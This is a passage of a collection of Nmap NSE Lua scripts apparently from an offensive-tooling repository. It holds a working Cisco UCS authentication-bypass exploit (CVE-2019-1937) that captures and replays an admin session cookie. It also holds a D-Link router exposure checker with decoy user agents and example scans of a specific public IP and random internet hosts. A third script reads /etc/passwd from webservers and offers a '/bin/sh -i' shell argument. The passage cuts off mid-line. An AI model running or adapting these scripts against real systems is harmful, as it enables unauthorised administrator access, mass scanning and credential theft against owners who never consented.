your internal ip addr - Default: nil (auto-seach) 73 | -- Manual Input: nmap -sV -p 80 --open --script cisco-cve-2019-1937.nse --script-args "lhost=192.168.1.71" 74 | --- 75 | 76 | author = "r00t-3xp10it" 77 | copyright = "Pedro Ribeiro" 78 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 79 | categories = {"safe", "vuln"} 80 | 81 | 82 | -- DEPENDENCIES (lua nse libs) -- 83 | local http = require "http" 84 | local table = require "table" 85 | local vulns = require "vulns" 86 | local string = require "string" 87 | local stdnse = require "stdnse" --> nse args usage 88 | local shortport = require "shortport" 89 | 90 | 91 | -- THE RULE SECTION -- 92 | -- Scan only the selected ports/proto/service_names in 'open state' 93 | portrule = shortport.port_or_service({80, 443}, "http, https", "tcp", "open") 94 | 95 | 96 | -- THE ACTION SECTION -- 97 | action = function(host, port) 98 | local decoy_agent = stdnse.get_script_args(SCRIPT_NAME..".User-Agent") or "Mozilla/5.0 (Android; Mobile; rv:40.0) Gecko/40.0 Firefox/45.0" 99 | local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/app/ui/ClientServlet?apiName=GetUserInfo" 100 | local force_cookie = stdnse.get_script_args(SCRIPT_NAME..".force_cookie") or "false" 101 | local verbose = stdnse.get_script_args(SCRIPT_NAME..".verbose") or "false" 102 | local ip_addr = stdnse.get_script_args(SCRIPT_NAME..".lhost") or nil 103 | local http_err,cookie_err,parse_cookie = "nil","nil","nil" 104 | local uri_stats,cookie_stats,vuln_test = nil,nil,nil 105 | 106 | 107 | if ( ip_addr == nil ) then 108 | -- Capture (Local) distro flavor { Windows | Linux } 109 | local socket = io.popen("ver 2>&1") --> supress io.popen() stdout error msg (2>&1) 110 | flavor = socket:read("*a"):gsub("\n", "") --> Strip 'new line' from OS flavor 111 | socket.close() 112 | if ( flavor == nil or flavor == "" or string.find(flavor, "not found")) then 113 | local socket = io.popen("uname -s") 114 | flavor = socket:read("*a"):gsub("\n", "") --> Strip 'new line' from OS flavor 115 | socket.close() 116 | end 117 | 118 | if (string.find(flavor, "[Ll]inux")) then 119 | -- Executing BASH command(s) and store results 120 | -- Storing network interface in use { wlan0 | eth0 } 121 | local socket = io.popen("netstat -r|grep 'default'|awk {'print $8'}") 122 | local int_addr = socket:read("*a"):gsub("\n", "") --> Strip 'new line' from interface 123 | socket:close() 124 | -- Storing Internal IP address to be used in header['host'] and header['referer'] 125 | local socket = io.popen("ifconfig "..int_addr.."|grep -m 1 'inet'|awk {'print $2'}") 126 | ip_addr = socket:read("*a"):gsub("\n", ""):gsub(" ", "") --> Strip 'new line'+'empty spaces' 127 | socket:close() 128 | elseif (string.find(flavor, "[Ww]indows")) then 129 | -- Executing CMD command and store results 130 | -- Storing Internal IP address to be used in header['host'] and header['referer'] 131 | local socket = io.popen("ipconfig|FINDSTR IPv4") 132 | ip_addr = socket:read("*a"):match(":(.*)"):gsub(" ", "") --> match everything after : 133 | socket.close() 134 | else 135 | -- This nse script its written to execute ONLY in (Local) Windows or Linux Operative Systems. 136 | print("| cisco-cve-2019-1937:\n| State: not compatible flavor: "..flavor.."\n| Remark: This nse only exec under Windows or Linux flavors\n|_") 137 | return nil 138 | end 139 | end 140 | 141 | 142 | -- Make sure we have the 'ip_addr' local variable set by now. { auto | manual } 143 | -- string.match(ip_addr, '%a+') will try to match any chars/words in ip_addr variable 144 | -- and automatic aborts nse execution { good response = ip addr must not contain letters } 145 | if (string.match(ip_addr, '%a+') or ip_addr == nil or ip_addr == "") then 146 | print("| cisco-cve-2019-1937:\n| State: nse cant retrieve internal ip addr\n| Manual Input: --script-args lhost=192.168.1.71,verbose=true\n|_") 147 | return nil --> abort further tests. 148 | end 149 | 150 | 151 | -- Identify servers that answer 200 to invalid HTTP requests 152 | -- and exit as these would invalidate the next nse tests 153 | local status_404, result_404, _ = http.identify_404(host, port) 154 | if ( status_404 and result_404 == 200 ) then 155 | print("| cisco-cve-2019-1937:\n| Uri: http://"..host.ip..":"..port.number.." (false positive)\n| Reason: All URIs tested return status [200] OK\n|_") 156 | return nil 157 | end 158 | 159 | 160 | -- Send [1º] GET request - to capture redirection = header['Location'] 161 | -- redirection local variable its then parsed to extract the redirection url, 162 | -- and rewrites uri local variable with the captured url { use in [2º] GET request } 163 | if ( not(ip_addr == nil or ip_addr == "") ) then 164 | local _send = {header={}} --> Build TCP request 'header' 165 | _send['header']['Host'] = ip_addr 166 | _send['header']['User-Agent'] = decoy_agent 167 | _send['header']['X-Requested-With'] = "XMLHttpRequest" 168 | _send['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" 169 | if ( port.number == 80 ) then _send['header']['Referer'] = "http://"..ip_addr.."/" end 170 | if ( port.number == 443 ) then _send['header']['Referer'] = "https://"..ip_addr.."/" end 171 | 172 | -- Send [1º] GET request and read response 173 | local response = http.get(host, port, uri, _send, { no_cache = true, no_cache_body = true }) 174 | if ( not(response or response.status) ) then 175 | uri_stats = "uri not found" 176 | elseif (response and response.status == 404) then 177 | uri_stats = "uri not found" 178 | http_err = response.status or "404" 179 | elseif (response and response.status == 302 or response.status == 303) then 180 | -- if [302|303] then Grab redirection url to use on next GET request 181 | local redirection = response.header and response.header['location'] or "" 182 | if ( not(redirection == nil or redirection == "") ) then 183 | -- Extract only the url from header['Location'] { /app/ui/login.jsp } 184 | -- This function strips from capture: { Location: Http[s]://192.168.1.71 } 185 | uri = redirection:match("[Hh]ttp[s]?://(.*)"):gsub(ip_addr, "");uri_stats = "true" 186 | -- Make sure we have been redirected to the rigth url: { /app/ui/login.jsp } 187 | if ( not(uri:match("/login")) ) then uri_stats = "Wrong header redirection"; http_err = response.status or "404" end 188 | else 189 | -- None redirection header['Location'] found 190 | uri_stats = "none header redirection" 191 | http_err = response.status or "nil" 192 | end 193 | else 194 | -- Wrong status code received 195 | uri_stats = "uri not found" 196 | http_err = response.status or "404" 197 | end 198 | end 199 | 200 | 201 | -- Send [2º] GET request - Follow the redirection uri to capture Set-Cookie { auth cookie } 202 | -- we are now sending a GET request using the redirection url captured in last request { rewrite uri } 203 | -- Set-Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC745; Path=/app; Secure; HttpOnly 204 | if ( uri_stats == "true" ) then 205 | local _hijack = {header={}} --> Build TCP request 'header' 206 | _hijack['header']['Host'] = ip_addr 207 | _hijack['header']['User-Agent'] = decoy_agent 208 | _hijack['header']['X-Requested-With'] = "XMLHttpRequest" 209 | _hijack['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" 210 | if ( port.number == 80 ) then _hijack['header']['Referer'] = "http://"..ip_addr.."/" end 211 | if ( port.number == 443 ) then _hijack['header']['Referer'] = "https://"..ip_addr.."/" end 212 | 213 | -- Send [2º] GET request and read response 214 | local res = http.get(host, port, uri, _hijack, { no_cache = true, no_cache_body = true }) 215 | if ( not(res or res.status) ) then 216 | cookie_stats = "none response from server" 217 | elseif (res and res.status == 200) then 218 | -- if [200] then Grab Set-Cookie value to use on next GET request. 219 | local set_cookie = res.header and res.header['set-cookie'] or "" 220 | if ( not(set_cookie == nil or set_cookie == "") ) then 221 | cookie_stats = "true" 222 | -- Extract only the cookie value from header['Set-Cookie'] { strip extra chars } 223 | -- Sometimes ['set-cookie'] field does not contain { Secure; | HttpOnly } strings. 224 | -- This function will strip (delete) ALL those extra strings from captured Cookie. 225 | parse_cookie = set_cookie:match(":(.*)") --> match everything after [ : ] char 226 | if ( not(parse_cookie:match(";")) ) then 227 | local extr_semi = parse_cookie:gsub(" ", "") --> strip empty spaces from cookie value 228 | parse_cookie = extr_semi..";" --> add ; to the end of cookie value 229 | else 230 | local extr_char = parse_cookie:match(";(.*)") --> match everything after [ ; ] char 231 | parse_cookie = parse_cookie:gsub(extr_char, ""):gsub(" ", "") 232 | end 233 | -- Make sure that we have captured the rigth cookie name { JSESSIONID= } 234 | -- Users can still bypass this cookie name check by calling script @args "force_cookie=true" 235 | if ( not(parse_cookie:match("^JSESSIONID[=$]")) and force_cookie == "false" ) then 236 | cookie_err = res.status or "nil"; cookie_stats = "wrong cookie name"; parse_cookie = "nil" 237 | end 238 | else 239 | -- None header['Set-Cookie'] found 240 | cookie_stats = "none cookie" 241 | cookie_err = res.status or "nil" 242 | end 243 | else 244 | -- Wrong status code received 245 | cookie_stats = "Wrong status code" 246 | cookie_err = res.status or "404" 247 | end 248 | end 249 | 250 | 251 | -- Build Nmap vulnerable {table} 252 | local vuln_table = { 253 | title = "Cisco UCS Supervisor (Web Interface Auth Bypass)", 254 | state = vulns.STATE.NOT_VULN, 255 | IDS = {CVE = 'CVE-2019-1937'}, 256 | risk_factor = "Critical", 257 | scores = { 258 | CVSSv2 = "10.0 CRITICAL (AV:N/AC:L/Au:N/C:C/I:C/A:C)", 259 | }, 260 | description = [[ 261 | A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Supervisor, 262 | Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker 263 | to acquire a valid session token with administrator privileges, bypassing user authentication. The vulnerability 264 | is due to insufficient request header validation during the authentication process. An attacker could exploit this 265 | vulnerability by sending a series of malicious requests to an affected device. An exploit could allow the attacker 266 | to use the acquired session token to gain full administrator access to the affected device. 267 | ]], 268 | references = { 269 | 'https://nvd.nist.gov/vuln/detail/CVE-2019-1937', 270 | 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby', 271 | 'https://packetstormsecurity.com/files/154239/Cisco-UCS-IMC-Supervisor-Authentication-Bypass-Command-Injection.html', 272 | }, 273 | dates = { 274 | disclosure = {year = '2019', month = 'Ago', day = '21'}, 275 | }, 276 | exploit_results = {}, --> Display auth cookie and creds 277 | } 278 | 279 | -- Build vulnerable stdout { vuln_table } 280 | if (uri_stats == "true" and cookie_stats == "true") then 281 | table.insert(vuln_table.exploit_results, string.format("Attack Vector: Remote")) 282 | if (port.number == 443) then table.insert(vuln_table.exploit_results, string.format("Uri: https://"..host.ip..":"..port.number..uri)) end 283 | if (port.number == 80) then table.insert(vuln_table.exploit_results, string.format("Uri: http://"..host.ip..":"..port.number..uri)) end 284 | table.insert(vuln_table.exploit_results, string.format("Auth-Cookie: "..parse_cookie.."\n")) 285 | end 286 | 287 | 288 | -- Send [3º] GET request - admin session cookie Authentication 289 | if (uri_stats == "true" and cookie_stats == "true") then 290 | local _exploit = {header={}} --> Build TCP request 'header' 291 | _exploit['header']['Host'] = ip_addr 292 | _exploit['header']['Cookie'] = parse_cookie 293 | _exploit['header']['User-Agent'] = decoy_agent 294 | _exploit['header']['X-Requested-With'] = "XMLHttpRequest" 295 | _exploit['header']['X-Starship-UserSession-Key'] = "ssa" --> can be a random string 296 | _exploit['header']['X-Starship-Request-Key'] = "redteam" --> can be a random string 297 | _exploit['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" 298 | if ( port.number == 80 ) then _exploit['header']['Referer'] = "http://"..ip_addr.."/" end 299 | if ( port.number == 443 ) then _exploit['header']['Referer'] = "https://"..ip_addr.."/" end 300 | 301 | -- Send [3º] GET request and read response 302 | uri = "/app/ui/ClientServlet?apiName=GetUserInfo" 303 | local vuln_test = http.get(host, port, uri, _exploit, { no_cache = true, no_cache_body = true }) 304 | if (vuln_test and vuln_test.status == 200) then 305 | vuln_table.state = vulns.STATE.VULN 306 | local report = vulns.Report:new(SCRIPT_NAME, host, port) 307 | return report:make_output(vuln_table) 308 | elseif (vuln_test and vuln_test.status ~= 200) then 309 | -- Delete the last char from [Referer] to build display 310 | local parse_ref = _exploit['header']['Referer']:sub(1, -2) 311 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: POSSIBLE VULNERABLE to CVE-2019-1937 [ ? ]\n Remark: _exploit['header']['Cookie'] authentication Failed.\n Port: "..port.number.." Uri: "..parse_ref..":"..port.number..uri.."\n Auth-Cookie: "..parse_cookie.."\n\n" 312 | end 313 | 314 | -- Error messages { IF: verbose=true } 315 | elseif (uri_stats == "uri not found" and verbose == "true") then 316 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..http_err.."] uri not found in server\n\n" 317 | elseif (uri_stats == "none header redirection" and verbose == "true") then 318 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..http_err.."] None redirection header found\n\n" 319 | elseif (uri_stats == "Wrong header redirection" and verbose == "true") then 320 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..http_err.."] Wrong url redirection\n\n" 321 | elseif (cookie_stats == "none response from server" and verbose == "true") then 322 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..cookie_err.."] None response from server\n\n" 323 | elseif (cookie_stats == "wrong cookie name" and verbose == "true") then 324 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937 [ ? ]\n Reason: ["..parse_cookie.."] wrong cookie name\n Remark: bypass cookie name checks: --script-args force_cookie=true\n\n" 325 | elseif (cookie_stats == "Wrong status code" and verbose == "true") then 326 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..cookie_err.."] Wrong status code received\n\n" 327 | elseif (cookie_stats == "none cookie" and verbose == "true") then 328 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..cookie_err.."] None authentication cookie found\n\n" 329 | end 330 | end 331 | -------------------------------------------------------------------------------- /dlink-cve-2019-13101.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE dlink-cve-2019-13101.nse - Version 1.12 3 | -- Copy to: /usr/share/nmap/scripts/dlink-cve-2019-13101.nse 4 | -- Update NSE database: sudo nmap --script-updatedb 5 | -- execute: nmap --script-help dlink-cve-2019-13101.nse 6 | -- Port(s) accepted by this nse: 80,443,8080-8082 7 | --- 8 | 9 | 10 | description = [[ 11 | 12 | Module Author: r00t-3xp10it {Disclosure = Devendra Singh} 13 | Detects whether the D-Link DIR-600 or DIR-615 router is vulnerable to Incorrect Access Control Vulnerability (CVE-2019-13101). 14 | A remote vulnerability was discovered on D-Link DIR-600M/DIR-615 Wireless Home Router in multiple respective firmware versions 15 | (3.02 up to 3.06). The vulnerability provides unauthenticated remote access to the routers WAN configuration page i.e. '/wan.htm' 16 | which leads to disclosure of sensitive user info about the WAN, including but not limited to PPPoE, DNS configuration etc, also 17 | allowing us to change the router configuration settings. 18 | 19 | Some Syntax examples: 20 | nmap --script-help dlink-cve-2019-13101.nse 21 | nmap -sV -Pn -n -p 80,443,8080-8082 --open --script dlink-cve-2019-13101.nse 37.99.213.95 22 | nmap -sV -Pn -n -p 80,443 --open --script dlink-cve-2019-13101.nse --script-args "verbose=true" 37.99.213.95 23 | nmap -sS -Pn -n -p 80,443,8080-8082 --open --script dlink-cve-2019-13101.nse --script-args "uri=/" 37.99.213.95 24 | nmap -sS -Pn -n -p 80,443 --open --script dlink-cve-2019-13101.nse --script-args "uri=/,User-Agent=Apache-HttpClient/4.0.3" 37.99.213.95 25 | nmap -sV -v -Pn -n -T4 -iR 800 -p 80,443,8080 --open --script=http-headers.nse,dlink-cve-2019-13101.nse --script-args "verbose=true" 26 | 27 | ]] 28 | 29 | --- 30 | -- @usage: 31 | -- nmap --script-help dlink-cve-2019-13101.nse 32 | -- nmap -sV -Pn -n -p 80,443,8080-8082 --open --script dlink-cve-2019-13101.nse 37.99.213.95 33 | -- nmap -sV -Pn -n -p 80,443 --open --script dlink-cve-2019-13101.nse --script-args "verbose=true" 37.99.213.95 34 | -- nmap -sS -Pn -n -p 80,443,8080-8082 --open --script dlink-cve-2019-13101.nse --script-args "uri=/" 37.99.213.95 35 | -- nmap -sS -Pn -n -p 80,443 --open --script dlink-cve-2019-13101.nse --script-args "uri=/,User-Agent=Apache-HttpClient/4.0.3" 37.99.213.95 36 | -- nmap -sV -v -Pn -n -T4 -iR 800 -p 80,443,8080 --open --script=http-headers.nse,dlink-cve-2019-13101.nse --script-args "verbose=true" 37 | -- @output 38 | -- PORT STATE SERVICE VERSION 39 | -- 443/tcp open http D-Link DIR-600 WAP http config 2.17 40 | -- | dlink-cve-2019-13101: 41 | -- | VULNERABLE: 42 | -- | D-Link DIR-600/615 Wireless Home Router 43 | -- | State: VULNERABLE 44 | -- | IDs: CVE:CVE-2019-13101 45 | -- | Risk factor: Medium CVSSv2: 7.5 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:P/A:P) 46 | -- | A remote vulnerability was discovered on D-Link DIR-600/DIR-615 Wireless Home Router in multiple respective firmware 47 | -- | versions (3.02 up to 3.06). The vulnerability provides unauthenticated remote access to the routers WAN configuration 48 | -- | page i.e. '/wan.htm', which leads to disclosure of sensitive info about the WAN, including but not limited to PPPoE, 49 | -- | DNS configuration etc, also allowing us to change the router configuration settings. 50 | -- | 51 | -- | Disclosure date: 2019-Ago-08 52 | -- | Exploit results: 53 | -- | Uri: http://37.99.213.95:443/ 54 | -- | DLink version: DIR-600 Ver 2.17 55 | -- | Found a match between (TITLE|PPPoE) 56 | -- | 57 | -- | Referencies: 58 | -- | https://nvd.nist.gov/vuln/detail/CVE-2019-13101 59 | -- | https://www.cybersecurity-help.cz/vdb/SB2019081001 60 | -- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13101 61 | -- |_ 62 | -- @args verbose => Display More verbose outputs - Default: false 63 | -- @args uri => the URL path to search in host.ip - Default: /wan.htm 64 | -- @args. User-Agent => User-Agent to send in requests - Default: Googlebot/2.1 65 | --- 66 | 67 | 68 | author = "r00t-3xp10it" 69 | copyright = "Devendra Singh" 70 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 71 | categories = {"save", "vuln"} 72 | 73 | 74 | -- DEPENDENCIES (lua nse libs) -- 75 | local http = require "http" 76 | local table = require "table" 77 | local vulns = require "vulns" 78 | local stdnse = require "stdnse" 79 | local string = require "string" 80 | local shortport = require "shortport" 81 | 82 | 83 | -- THE RULE SECTION -- 84 | portrule = shortport.port_or_service({80, 443, 8080, 8081, 8082}, "http, http-proxy, https", "tcp", "open") 85 | local verbose = stdnse.get_script_args(SCRIPT_NAME..".verbose") or "false" 86 | local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/wan.htm" 87 | local uri_found, version_match 88 | 89 | 90 | -- THE ACTION SECTION -- 91 | action = function(host, port) 92 | -- Manipulate TCP packet 'header' with false information about attacker :D 93 | local _decoy = {header={}} --> manipulate 'header' request .. 94 | _decoy['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".User-Agent") or "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" --> use 'Googlebot/2.1' User-agent OR input a new one... 95 | _decoy['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language 96 | _decoy['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it) 97 | 98 | 99 | -- Identify servers that answer [200] to invalid HTTP requests 100 | -- and exit them (abort exec) as these would invalidate the tests. 101 | local status_404, result_404, _ = http.identify_404(host, port) 102 | if ( status_404 and result_404 == 200 ) then 103 | print("CVE-2019-13101:\n| Exiting: "..host.ip..":"..port.number..uri.." (false positive)\n| Reason: All URIs tested return status [200] OK\n|_") 104 | return nil 105 | end 106 | 107 | 108 | -- Make sure that uri respondes with 200 [OK] { no redirection | no_cache } 109 | -- [001] importante check to be abble to classify host.ip as state.vulnerable 110 | local response = http.get(host, port, uri, { redirect_ok = false, no_cache = true, no_cache_body = true }) 111 | if ( not(response or response.status) ) then 112 | return nil 113 | elseif (response and response.status == 200) then 114 | uri_found = "true" 115 | elseif (response and response.status ~= 200) then 116 | uri_found = "false" 117 | end 118 | 119 | 120 | -- Table of (arrays) DLINK vulnerable version(s) 121 | -- REMARK: vuln_table = { #DIR-600 Ver 2.17 } => ITS NOT VULN (Used For Debug at develop stage). 122 | vuln_table = {"DIR-600 Ver 2.17", "DIR-600 Ver 3.02", "DIR-600 Ver 3.03", "DIR-600 Ver 3.04", "DIR-600 Ver 3.05", "DIR-600 Ver 3.06", "DIR-615 Ver 3.02", "DIR-615 Ver 3.03", "DIR-615 Ver 3.04", "DIR-615 Ver 3.05", "DIR-615 Ver 3.06"} 123 | local header_server = response.header and response.header['server'] or "" 124 | -- Parse 'header_server' response... IF it contains the string { HTTP/1.1 | HTTP/1.2 } 125 | -- Some header['server'] respondes with { DISTRO_flavor, HTTP_method, } others dont. 126 | if string.find(header_server, "HTTP/1.1,") or string.find(header_server, "HTTP/1.2,") then 127 | pp_headers = header_server:sub(18) --> Delete { Linux, HTTP/1.1, | Linux, HTTP/1.2, } from response.header 128 | else 129 | pp_headers = header_server 130 | end 131 | 132 | 133 | -- Loop through {vuln_table} to find a :match to response.header['server'] 134 | -- [002] importante check to be abble to classify host.ip as state.vulnerable 135 | for i, vuln_version in pairs(vuln_table) do 136 | if (pp_headers == vuln_version) then 137 | version_match = "true" 138 | break --> break loop if a match its found 139 | else 140 | version_match = "false" 141 | end 142 | end 143 | 144 | 145 | -- Build Nmap vulnerable {table} 146 | local vuln_table = { 147 | title = "D-Link DIR-600/615 Wireless Home Router", 148 | state = vulns.STATE.NOT_VULN, 149 | IDS = {CVE = 'CVE-2019-13101'}, 150 | risk_factor = "Medium", 151 | scores = { 152 | CVSSv2 = "7.5 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:P/A:P)", 153 | }, 154 | description = [[ 155 | A remote vulnerability was discovered on D-Link DIR-600/DIR-615 Wireless Home Router in multiple respective firmware 156 | versions (3.02 up to 3.06). The vulnerability provides unauthenticated remote access to the routers WAN configuration 157 | page i.e. '/wan.htm', which leads to disclosure of sensitive info about the WAN, including but not limited to PPPoE, 158 | DNS configuration etc, also allowing us to change the router configuration settings. 159 | ]], 160 | references = { 161 | 'https://nvd.nist.gov/vuln/detail/CVE-2019-13101', 162 | 'https://www.cybersecurity-help.cz/vdb/SB2019081001', 163 | 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13101', 164 | }, 165 | dates = { 166 | disclosure = {year = '2019', month = 'Ago', day = '08'}, 167 | }, 168 | exploit_results = {}, --> Display exploit results 169 | } 170 | 171 | 172 | if (uri_found == "true" and version_match == "true") then 173 | table.insert(vuln_table.exploit_results, "Uri: http://"..host.ip..":"..port.number..uri) 174 | table.insert(vuln_table.exploit_results, "DLink version: "..pp_headers) 175 | table.insert(vuln_table.exploit_results, "Found a match between (TITLE|PPPoE)\n") 176 | end 177 | 178 | 179 | -- Try to :match 'response.body' againts diferent HTTP titles 180 | -- REMARK: If we are trying to NOT match the ALL string, then Special chars [ - ] 181 | -- must bee escaped [ % ] before using string.find() API { ie. D%-LINK | DIR%-6 } 182 | response = http.get(host, port, uri, _decoy, { redirect_ok = false, no_cache = true }) 183 | local vuln_title = "D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME" 184 | if ( not(response.body) ) then 185 | title = "not found" --> set title as "not found" to use :match("PPPoE") method 186 | else 187 | if string.find(response.body, vuln_title) then 188 | title = vuln_title --> Query for: full HTTP title (default) 189 | elseif string.find(response.body, "D%-LINK") then 190 | title = "D%-LINK" --> query for: D-LINK expressions (response.body) 191 | elseif string.find(response.body, "DIR%-6") then 192 | title = "DIR%-6" --> query for: DIR-600 and DIR-615 (title ) 193 | else 194 | -- None comrrespondent title found (response.body) 195 | -- set title as "not found" to use :match("PPPoE") method 196 | title = "not found" 197 | end 198 | end 199 | 200 | 201 | -- Final checks (uri_found|version_match|title_match OR PPPoE) 202 | if (uri_found == "false" and verbose == "true") then 203 | return "\n D-Link DIR-600/615 Wireless Home Router\n State: NOT VULNERABLE to CVE-2019-13101\n Reason: [001] Uri Not Found in Response\n\n" 204 | elseif (version_match == "false" and verbose == "true") then 205 | return "\n D-Link DIR-600/615 Wireless Home Router\n State: NOT VULNERABLE to CVE-2019-13101\n Reason: [002] Not Vuln Server Version\n\n" 206 | -- [003] importante check to be abble to classify host.ip as state.vulnerable 207 | elseif ( not(string.find(response.body, title) or response.body:match("PPPoE")) ) then 208 | if (verbose == "true") then return "\n D-Link DIR-600/615 Wireless Home Router\n State: NOT VULNERABLE to CVE-2019-13101\n Reason: [003] None Match Found (TITLE|PPPoE)\n\n" end 209 | -- We have reached The ['vulnerable_target'] == All [3] importante tests have succeded .. response.body:match(title) 210 | elseif (uri_found == "true" and version_match == "true" and response.body:match("PPPoE") or uri_found == "true" and version_match == "true" and string.find(response.body, title)) then 211 | vuln_table.state = vulns.STATE.VULN 212 | local report = vulns.Report:new(SCRIPT_NAME, host, port) 213 | return report:make_output(vuln_table) 214 | end 215 | end 216 | -------------------------------------------------------------------------------- /file-checker.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE file-checker.nse - Version 1.6 3 | -- Copy script to: /usr/share/nmap/scripts/file-checker.nse 4 | -- Update db: sudo nmap --script-updatedb 5 | -- executing: nmap --script-help file-checker.nse 6 | --- 7 | 8 | 9 | -- SCRIPT BANNER DESCRIPTION -- 10 | description = [[ 11 | 12 | Author: r00t-3xp10it 13 | NSE script to check/read contents of the selected file/path in target webserver. 14 | This module will search if 'index' exists, and if used --script-args read=true 15 | then file-checker.nse script will read/display the contents of the 'index' file. 16 | 17 | This script also gives you the ability to search for a diferent 'index' (files or directory) 18 | using --script-args index=/file-to-search or index=/directory-to-search, or set a diferent 19 | User-agent to send in the ofending tcp packet --script-args agent= 20 | 'Default behavior its to search for robots.txt file in webserver' 21 | 22 | This script also gives to is users the ability to use the lost '--interactive' nmap 23 | switch, that allow us to interact with the bash shell inside of nmap funtions using: 24 | nmap -sV -Pn -p 80 --script file-checker.nse --script-args "command=/bin/sh -i" 25 | 'WARNING: The 'command' argument does not work together with other script arguments' 26 | 27 | 28 | Some Syntax examples: 29 | nmap -sS -Pn -p 80 --open --script file-checker.nse 30 | nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/etc/passwd" 31 | nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "command=/bin/sh -i" 32 | nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/robots.txt,read=true" 33 | nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 34 | nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/index.html,read=true" --spoof-mac Apple 35 | nmap -sV -Pn -T4 -iR 400 -p 80 --open --reason --script file-checker.nse --script-args "index=/etc/passwd,read=true" -oN creds.log 36 | nmap -sI -Pn -p 80 --scan-delay 8 --script file-checker.nse --script-args "index=/robots.txt,read=true" , 37 | 38 | ]] 39 | 40 | --- 41 | -- @usage 42 | -- nmap --script-help file-checker.nse 43 | -- nmap -sS -Pn -p 80 --open --script file-checker.nse 44 | -- nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/etc/passwd" 45 | -- nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "command=/bin/sh -i" 46 | -- nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/robots.txt,read=true" 47 | -- nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 48 | -- nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/index.html,read=true" --spoof-mac Apple 49 | -- nmap -sV -Pn -T4 -iR 400 -p 80 --open --reason --script file-checker.nse --script-args "index=/etc/passwd,read=true" -oN creds.log 50 | -- nmap -sI -Pn -p 80 --scan-delay 8 --script file-checker.nse --script-args "index=/robots.txt,read=true" , 51 | -- @output 52 | -- PORT STATE SERVICE 53 | -- 80/tcp open http 54 | -- | file-checker: 55 | -- | index: /robots.txt 56 | -- | STATUS: 200 OK FOUND 57 | -- | module author: r00t-3xp10it 58 | -- | user-agent : Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 59 | -- | 60 | -- | CONTENTS: 61 | -- | # robots.txt of youtube since the time dinosaurs walk the hearth 62 | -- | # This file should be placed into your website webroot directory. 63 | -- | 64 | -- | User-agent: * 65 | -- | Disallow: /SSA/ 66 | -- | Disallow: /porn/ 67 | -- | Disallow: /login/ 68 | -- | Disallow: /cache/ 69 | -- | Disallow: /search/ 70 | -- | Disallow: /privacy/ 71 | -- | Disallow: /includes/ 72 | -- | Disallow: /credentials/ 73 | -- |_ 74 | -- @args search.index -> The file/path name to search -> Default: /robots.txt 75 | -- @args fakeUser.agent -> The User-agent to send in header request -> Default: iPhone,safari 76 | -- @args contents.read -> Read contents of the 'index' file selected ? -> Default: false 77 | -- @args local.command -> intercative bash shell -> Default: false 78 | --- 79 | 80 | author = "r00t-3xp10it" 81 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 82 | categories = {"discovery", "safe"} 83 | 84 | 85 | -- DEPENDENCIES (lua nse libraries) -- 86 | local shortport = require "shortport" 87 | local stdnse = require ('stdnse') 88 | local http = require "http" 89 | local os = require "os" 90 | 91 | 92 | -- THE RULE SECTION -- 93 | -- Port rule will only execute if port 80/443 tcp http/https its on open state 94 | portrule = shortport.port_or_service({80, 443}, "http, https", "tcp", "open") 95 | -- Seach for string stored in variable @args or use the default ones... 96 | local index = stdnse.get_script_args(SCRIPT_NAME..".index") or "/robots.txt" 97 | local command = stdnse.get_script_args(SCRIPT_NAME..".command") or "false" 98 | local read = stdnse.get_script_args(SCRIPT_NAME..".read") or "false" 99 | local agent_string = stdnse.get_script_args(SCRIPT_NAME..".agent") or 